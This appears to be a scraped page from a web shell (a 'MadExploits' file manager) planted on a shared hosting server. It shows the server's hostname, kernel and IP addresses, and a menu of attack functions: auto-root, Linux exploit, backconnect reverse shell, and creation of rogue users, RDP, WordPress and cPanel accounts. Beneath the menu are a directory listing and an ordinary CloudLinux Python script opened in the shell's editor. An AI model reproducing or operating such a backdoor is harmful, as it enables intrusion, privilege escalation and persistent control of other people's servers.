Linux server241.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 199.188.200.87 | : 216.73.216.149
Cant Read [ /etc/named.conf ]
8.0.30
emerlyju
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
cloudlinux /
venv /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
Activate.ps1
8.82
KB
-rw-r--r--
activate
1.65
KB
-rw-r--r--
activate.csh
915
B
-rw-r--r--
activate.fish
2.14
KB
-rw-r--r--
alembic
202
B
-rwxr-xr-x
cagefs_enter_site.py
1.83
KB
-rwxr-xr-x
cagefsctl_user.py
12.89
KB
-rwxr-xr-x
chardetect
210
B
-rwxr-xr-x
cl_sysctl
4.51
KB
-rwxr-xr-x
clcpapi
3.64
KB
-rwxr-xr-x
coverage
204
B
-rwxr-xr-x
coverage-3.11
204
B
-rwxr-xr-x
coverage3
204
B
-rwxr-xr-x
cpanel-dbmapping
3.83
KB
-rwxr-xr-x
crontab-user-wrapper.py
2.46
KB
-rwxr-xr-x
da_suid_caller.py
686
B
-rw-r--r--
detect-requirements
211
B
-rwxr-xr-x
dodgy
197
B
-rwxr-xr-x
epylint
208
B
-rwxr-xr-x
f2py
205
B
-rwxr-xr-x
f2py3
205
B
-rwxr-xr-x
f2py3.11
205
B
-rwxr-xr-x
flake8
203
B
-rwxr-xr-x
futurize
204
B
-rwxr-xr-x
get_gprof
1.84
KB
-rwxr-xr-x
get_objgraph
1.63
KB
-rwxr-xr-x
isort
198
B
-rwxr-xr-x
isort-identify-imports
232
B
-rwxr-xr-x
jsonschema
202
B
-rwxr-xr-x
lvestats_config_reader.py
1.12
KB
-rw-r--r--
mako-render
202
B
-rwxr-xr-x
normalizer
233
B
-rwxr-xr-x
pasteurize
206
B
-rwxr-xr-x
pip
237
B
-rwxr-xr-x
pip3
237
B
-rwxr-xr-x
pip3.11
237
B
-rwxr-xr-x
plesk_suid_caller.py
905
B
-rw-r--r--
prospector
202
B
-rwxr-xr-x
py.test
210
B
-rwxr-xr-x
pycodestyle
201
B
-rwxr-xr-x
pydocstyle
202
B
-rwxr-xr-x
pyflakes
200
B
-rwxr-xr-x
pylint
206
B
-rwxr-xr-x
pylint-config
222
B
-rwxr-xr-x
pyreverse
212
B
-rwxr-xr-x
pysemver
198
B
-rwxr-xr-x
pytest
210
B
-rwxr-xr-x
python
15.59
KB
-rwxr-xr-x
python3
15.59
KB
-rwxr-xr-x
python3.11
15.59
KB
-rwxr-xr-x
raven
208
B
-rwxr-xr-x
symilar
208
B
-rwxr-xr-x
tap
196
B
-rwxr-xr-x
tappy
196
B
-rwxr-xr-x
undill
603
B
-rwxr-xr-x
virtualenv
227
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cagefs_enter_site.py
#!/opt/cloudlinux/venv/bin/python3 -sbb # -*- coding: utf-8 -*- # # Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2025 All Rights Reserved # # Licensed under CLOUD LINUX LICENSE AGREEMENT # https://cloudlinux.com/docs/LICENCE.TXT # """ Execute a command inside CageFS for a site (document root or domain). This wrapper provides a command-line interface for executing commands within the isolated CageFS environment for a specific website. """ import argparse import os import sys from clcagefslib.webisolation import libenter def create_parser(): """ Create argument parser for cagefs_enter_site. Returns: argparse.ArgumentParser: Configured argument parser """ parser = argparse.ArgumentParser( # the command is named with _underscores_ to match # existing cagefs_enter wrapper from lvewrappers prog="cagefs_enter_site", description="Execute a command inside CageFS for a site (document root or domain)", ) parser.add_argument("site", type=str, help="Document root or domain") parser.add_argument( "command", type=str, nargs=argparse.REMAINDER, help="Command to execute" ) return parser def main(): """ Main entry point. Returns: int: Exit code """ parser = create_parser() args = parser.parse_args() if not args.command: parser.error("COMMAND is required") try: return libenter.enter_site(args.site, args.command) except ValueError as e: print(f"Error: {e}", file=sys.stderr) return 1 except KeyboardInterrupt: # Clean Ctrl+C exit without traceback (exit code 130 = SIGINT). return 130 if __name__ == "__main__": if os.geteuid() == 0: print("Error: This program can not be run as root", file=sys.stderr) sys.exit(1) sys.exit(main())
Close